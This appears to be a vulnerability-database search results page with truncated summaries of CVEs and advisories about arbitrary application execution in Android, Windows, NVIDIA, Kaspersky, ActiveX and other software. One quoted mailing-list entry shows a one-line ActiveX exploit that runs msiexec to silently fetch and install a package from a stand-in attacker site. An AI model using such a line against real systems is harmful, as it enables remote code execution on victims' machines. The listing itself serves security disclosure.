51 matches found
CVE-2019-6447
The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to...
CVE-2018-20681
mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices such as additionally attached graphical outputs via HDMI, VGA, DVI, etc...
CVE-2018-15491
A vulnerability in the permission and encryption implementation of Zemana Anti-Logger 1.9.3.527 and prior fixed in 1.9.3.602 allows an attacker to take control of the whitelisting feature MyRules2.ini under %LOCALAPPDATA%\Zemana\ZALSDK to permit execution of unauthorized applications such as ones...
About the security content of watchOS 4.1
About the security content of watchOS 4.1 This document describes the security content of watchOS 4.1. About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available...
CVE-2017-0245
The kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1 and Windows Server 2012 Gold allow a local authenticated attacker to execute a specially crafted application to obtain kernel information, aka "Win32k Information Disclosure Vulnerability."...
Design/Logic Flaw
NVIDIA GeForce Experience contains a vulnerability in NVIDIA Web Helper.exe, where untrusted script execution may lead to violation of application execution policy and local code execution...
CVE-2017-6250
NVIDIA GeForce Experience contains a vulnerability in NVIDIA Web Helper.exe, where untrusted script execution may lead to violation of application execution policy and local code execution...
Microsoft Edge browser vulnerability, allowing a hacker to execute an application with privileges of the current user
The vulnerability of the rendering mechanisms for executing browser script scenarios in Microsoft Edge is related to deficiencies in access control for certain functions. Exploiting this vulnerability can allow a malicious actor to execute an application with privileges of the current user...
PT-2017-04: Security Restrictions Bypass in Kaspersky Embedded Systems Security
The specialists of the Positive Research center have detected a Security Restrictions Bypass vulnerability in Kaspersky Embedded Systems Security. Vulnerability in the Application Control component of Kaspersky Embedded Systems Security allows attackers to gain privileges and execute arbitrary...
Interactive Studio GamePort 3.0/3.1/4.0 Arbitrary application execution
No description provided by source. source: http://www.securityfocus.com/bid/12006/info Gameport is reported prone to multiple vulnerabilities in the client and server. These issues may allow an attacker to gain unauthorized access to a vulnerable server and execute arbitrary code on a vulnerable...
Self-extracting archive (SFX) as Creative Virus Handler
Self-extracting archive SFX as Creative Virus Handler Yesterday I Found and interesting article about "Self-extracting archive SFX" on Unremote.org by DarkCoderSc. SFX is a little application that contains compressed files. Creating a customized WinRAR SFX archives is a very easy task, but not al...
ghostscript code execution
Application is executed by relative path upon .ps file parsing...
SILC Toolkit 'command.c'格式串漏洞
Bugraq ID: 36193 SILC Toolkit是一款提供SILC协议实现的软件开发工具集。 SILC Toolkit 'command.c'文件存在格式串错误,远程攻击者可以利用漏洞以应用程序权限执行任意指令。 目前没有详细漏洞细节提供。 SILC Toolkit 1.1.8 SILC Toolkit 1.1.6 SILC Toolkit 1.1.5 SILC Toolkit 1.1.4 SILC Toolkit 1.1.3 SILC Toolkit 1.1.2 SILC Toolkit 1.1.1 SILC Toolkit 1.1 厂商解决方案 用户可联系供应商升级到SIL...
Dns2tcp 'dns_decode.c'远程缓冲区溢出漏洞
BUGTRAQ ID: 32071 CNCAN ID:CNCAN-2008110402 Dns2tcp是在DNS报文中分装TCP会话的一套工具。 Dns2tcp 'dnsdecode.c'存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。 目前没有详细漏洞细节提供。 Herve Schauer Consultants HSC Dns2tcp 0.4.1 Herve Schauer Consultants HSC Dns2tcp 0.4 Herve Schauer Consultants HSC Dns2tcp 0.4 Herve Schauer Consultants H...
Adobe Presenter viewer.swf and loadflash.js XSS Vulnerability
The host is running Adobe Presenter, which prone to to input validation errors which can be exploited by malicious people to conduct cross-site scripting vulnerability. OpenVAS Vulnerability Test $Id: secpodadobepresenterxssvuln900110.nasl 5370 2017-02-20 15:24:26Z cfi $ Description: Adobe...
Java Plugin same-origin-policy bypass
Unspecified vulnerability in the Java Plug-in for Sun JDK and JRE 6 Update 4 and earlier, and 5.0 Update 14 and earlier; and SDK and JRE 1.4.216 and earlier, and 1.3.121 and earlier; allows remote attackers to bypass the same origin policy and "execute local applications" via unknown vectors...
Re: [Full-disclosure] Gateway WebLaunch ActiveX Control Insecure Method
I was playing with this a bit more. Everybody has the Windows Installer installed, right? How about this: obj.DoWebLaunch"","........windowssystem32msiexec.exe", "","/i http://www.evilsite.com/evilapp.msi /quiet"; Elazar On Tue, 08 Jan 2008 20:08:53 -0500 [email protected] wrote: The DoWebLaunc...
Windows平台下的Symantec Backup Exec存在未明远程漏洞
BUGTRAQ ID: 26837 CNCAN ID:CNCAN-2007121405 Symantec Backup Exec是一款集中式管理功能的网络数据保护解决方案。 Window平台下的Symantec Backup Exec存在未明安全问题,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 目前没有详细漏洞细节提供。 Symantec Backup Exec for Windows Servers 11d 目前没有详细解决方案提供: http://www.symantec.com/backupexec/index.jsp...
zabbix privilege escalation
Super-user privileges are not droppen on user-supplied application execution...
QEMU virtual machine buffer overflow
Buffer overflow in TranslationBlock on application execution in Guest OS...